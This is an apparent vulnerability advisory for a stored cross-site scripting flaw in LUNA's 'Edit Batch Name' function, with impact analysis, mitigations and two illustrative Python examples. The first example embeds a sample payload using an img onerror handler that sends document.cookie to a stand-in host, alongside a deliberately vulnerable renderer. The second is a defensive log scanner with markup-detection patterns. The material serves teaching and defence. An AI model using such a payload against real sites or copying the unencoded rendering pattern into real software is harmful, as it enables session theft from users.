CVE-2025-41065: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in Luna Imaging LUNA
Stored Cross-Site Scripting (XSS) vulnerability in LUNA software v7.5.5.6. This vulnerability allows an attacker to execute JavaScript code in the victim's browser by injecting a malicious payload through the 'Edit Batch Name' function. The payload is stored by the application and subsequently displayed without proper sanitization when other users access it. This vulnerability can be exploited to steal sensitive user data, such as session cookies, or to perform actions on behalf of the user.
AI Analysis
Technical Summary
CVE-2025-41065 is a stored Cross-Site Scripting (XSS) vulnerability, classified under CWE-79, in Luna Imaging's LUNA software version 7.5.5.6. The defect is in the 'Edit Batch Name' function: a name containing HTML or JavaScript is accepted, stored as submitted, and later written into the page without output encoding wherever the batch name is displayed. Any user who views that page runs the script in their own session, which allows session hijacking, theft of data visible to that user, and actions performed with the victim's privileges inside LUNA. The CVSS 4.0 base score is 5.1 (medium): the vector is network-based and user interaction is required, in the sense that a victim has to load a page showing the tampered name. The published summary lists no privileges as required, but the attacker must at least be able to reach the 'Edit Batch Name' function, so the practical privilege level depends on who is allowed to edit batch names in a given deployment. No patch and no known exploitation are reported at the time of writing. The root cause is missing input validation and, more importantly, missing context-aware output encoding; because the payload is persisted, it fires for every viewer without any further action by the attacker, which is what makes stored XSS more damaging than the reflected variety. The risk is highest where LUNA is used collaboratively and many users view the same batches. The CVE was reserved in April 2025 and published in February 2026.
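To make the rendering defect concrete, here is an added example in Python that is not LUNA code (Luna Imaging's implementation is not shown on this page): a minimal in-memory batch store, a vulnerable renderer that interpolates the stored name straight into HTML, and a hardened renderer that encodes at output time. The batch store, the row template, the sample payload and the helper that lists what a browser would parse out of the rendered row are all constructed for the demonstration.

```python
import html
from html.parser import HTMLParser

# Constructed in-memory stand-in for the application's batch table.
# Names are stored verbatim, which is the behaviour the advisory describes
# for the 'Edit Batch Name' function.
BATCHES: dict[str, str] = {}

# Constructed payload of the kind an attacker would submit as a batch name.
# The leading "> closes the title attribute so the img tag is parsed as
# markup; onerror then runs in every viewer's session.
XSS_BATCH_NAME = (
    '"><img src=x onerror=fetch(\'https://collector.invalid/?c=\'+document.cookie)>'
)


def edit_batch_name(batch_id: str, new_name: str) -> None:
    """Store whatever was submitted; no validation, as in the vulnerable app."""
    BATCHES[batch_id] = new_name


def render_batch_row_vulnerable(batch_id: str) -> str:
    """Interpolate the stored name straight into HTML (the CWE-79 pattern)."""
    name = BATCHES[batch_id]
    return f'<tr><td class="batch" title="{name}">{name}</td></tr>'


def render_batch_row_safe(batch_id: str) -> str:
    """Encode for the HTML context at output time. quote=True also makes the
    value safe inside the double-quoted title attribute."""
    name = html.escape(BATCHES[batch_id], quote=True)
    return f'<tr><td class="batch" title="{name}">{name}</td></tr>'


class _InjectedMarkup(HTMLParser):
    """Collects tags and on* attributes that are not part of the row template,
    i.e. markup that a browser would parse out of the batch-name value."""

    TEMPLATE_TAGS = {"tr", "td"}

    def __init__(self) -> None:
        super().__init__()
        self.found: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag not in self.TEMPLATE_TAGS:
            self.found.append(tag)
        for attr, _ in attrs:
            if attr.startswith("on"):
                self.found.append(f"{tag}@{attr}")


def injected_markup(rendered_html: str) -> list[str]:
    """Return the injected tags/handlers found in a rendered row ([] if clean)."""
    parser = _InjectedMarkup()
    parser.feed(rendered_html)
    parser.close()
    return parser.found


if __name__ == "__main__":
    edit_batch_name("1043", XSS_BATCH_NAME)
    print("vulnerable:", injected_markup(render_batch_row_vulnerable("1043")))
    print("safe      :", injected_markup(render_batch_row_safe("1043")))
```

The point of the parser helper is that the vulnerable row yields an `img` tag with an `onerror` handler, twice (once from the broken-out attribute, once from the cell body), while the encoded row yields nothing: the name is displayed as text, angle brackets and all. Encoding belongs at output time and per context; a name that is safe in an HTML text node is not automatically safe inside an attribute, a URL or a script block.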
Potential Impact
For European organizations the impact is moderate but real, particularly for cultural institutions and media companies that use LUNA for digital collections and digital asset management. A successful attack yields the victim's session and whatever data and actions that session can reach within LUNA; if stolen session tokens or credentials are reused elsewhere, the compromise can extend beyond the application. Exposure of personal data held in the system would be reportable under GDPR. The medium severity score reflects a single-session compromise per victim, but the collaborative nature of LUNA deployments widens the attack surface: every user who views a tampered batch name is a potential victim, and an attacker can simply wait for an administrator to open the page. The user interaction the score counts is the victim viewing a page that shows the stored name; no link has to be clicked, although phishing or social engineering could be used to lure a particular target to that page. No public exploit is known, but stored XSS payloads are trivial to craft once the vulnerable field is identified, so the absence of a public exploit should not be read as low likelihood. Overall, the vulnerability can compromise the confidentiality and integrity of user sessions and the data those sessions manage within affected European entities.
Mitigation Recommendations
Organizations running LUNA 7.5.5.6 should first establish which accounts can reach the 'Edit Batch Name' function and restrict it to trusted users until a fix is available. Because no official patch is reported, the remaining controls are compensating ones: a WAF rule that blocks markup in the batch name parameter (angle brackets, on* event-handler attributes, javascript: URIs, and their URL- and entity-encoded forms); output encoding applied at the application or reverse-proxy layer where that is feasible; and a Content-Security-Policy whose script-src omits 'unsafe-inline', so that injected inline scripts and event handlers do not execute even if a payload reaches the page. A WAF can be bypassed and does nothing about payloads already stored, so existing batch names should be audited for markup and cleaned. Log every batch-name edit with the submitting account and the new value, and alert on values that contain markup; that both detects attempts and identifies the account to disable. User awareness training helps only against lures that drive a target to a tampered page; once a payload is stored, ordinary use of the application triggers it. Stay in contact with Luna Imaging for a patch and apply it promptly once released, and include custom LUNA integrations in regular security assessments and code reviews so the same rendering mistake is not repeated elsewhere.
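The detection and CSP points above, as an added example in Python that is not LUNA's own tooling: a scanner over constructed audit-log lines that flags batch-name edits whose new value contains markup (including URL- and entity-encoded forms), and a check that a Content-Security-Policy value actually neutralizes inline scripts and event handlers. The log format is invented for the example; LUNA's real log layout is not documented on this page, so the line regex would need adapting to it.

```python
import html
import re
from urllib.parse import unquote

# Constructed audit-log lines in an invented format (LUNA's real log layout
# is not documented here). Two benign edits, one of them containing a bare
# '<', two injection attempts (one URL-encoded), and one non-edit event.
SAMPLE_LOG = """\
2026-02-04T10:12:03Z user=alice action=editBatchName batch=1042 name="Field trip 2025"
2026-02-04T10:12:40Z user=bob action=editBatchName batch=1044 name="Boxes < 1990 & later"
2026-02-04T10:13:41Z user=mallory action=editBatchName batch=1043 name="\\"><img src=x onerror=alert(document.cookie)>"
2026-02-04T10:14:05Z user=mallory action=editBatchName batch=1045 name="%3Csvg%20onload%3Dalert(1)%3E"
2026-02-04T10:15:00Z user=alice action=viewBatch batch=1043 name=""
"""

LOG_LINE = re.compile(
    r'^(?P<ts>\S+) user=(?P<user>\S+) action=(?P<action>\S+) '
    r'batch=(?P<batch>\S+) name="(?P<name>(?:[^"\\]|\\.)*)"$'
)

# Indicators of markup in a value that should only ever be a display name.
# A '<' followed by whitespace or a digit (as in "Boxes < 1990") is not a tag.
MARKUP = [
    (re.compile(r"<\s*[a-zA-Z!/?]"), "html-tag"),
    (re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE), "event-handler"),
    (re.compile(r"javascript\s*:", re.IGNORECASE), "javascript-uri"),
]


def normalize(value: str) -> str:
    """Undo the encodings an attacker uses to slip past naive filters:
    backslash-escaped quotes from the log, URL encoding, HTML entities."""
    value = value.replace('\\"', '"')
    value = unquote(value)
    return html.unescape(value)


def flag_batch_name_edits(log_text: str) -> list[dict]:
    """Return one record per editBatchName event whose new name contains markup."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m or m["action"] != "editBatchName":
            continue
        name = normalize(m["name"])
        reasons = [label for pattern, label in MARKUP if pattern.search(name)]
        if reasons:
            hits.append({"ts": m["ts"], "user": m["user"],
                         "batch": m["batch"], "reasons": reasons})
    return hits


def csp_blocks_inline_scripts(csp: str) -> bool:
    """True if this Content-Security-Policy stops inline <script> blocks and
    on* handlers, which is what a stored XSS payload in a batch name relies on.
    Browsers ignore 'unsafe-inline' when a nonce or hash source is also
    present, so that combination still counts as blocking."""
    directives: dict[str, list[str]] = {}
    for part in csp.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return False          # no script restriction at all
    if "'unsafe-inline'" not in sources:
        return True
    return any(s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-"))
               for s in sources)


if __name__ == "__main__":
    for hit in flag_batch_name_edits(SAMPLE_LOG):
        print(hit)
    print(csp_blocks_inline_scripts("default-src 'self'; script-src 'self'"))
```

Two things the example makes visible: decoding before matching is what catches the URL-encoded `<svg onload=...>` attempt, and the benign `Boxes < 1990` name is not flagged because a tag needs a name after the `<`. The CSP check only answers whether inline script is blocked; a script-src that allows `*` or untrusted hosts would still let an attacker load remote script, which is a separate review item.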
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Sweden
Technical Details
- Data Version: 5.2
- Assigner Short Name: INCIBE
- Date Reserved: 2025-04-16T09:09:34.457Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 69823426f9fa50a62fd6b734
Added to database: 2/3/2026, 5:45:10 PM
Last enriched: 2/3/2026, 5:59:54 PM
Last updated: 2/6/2026, 11:31:16 PM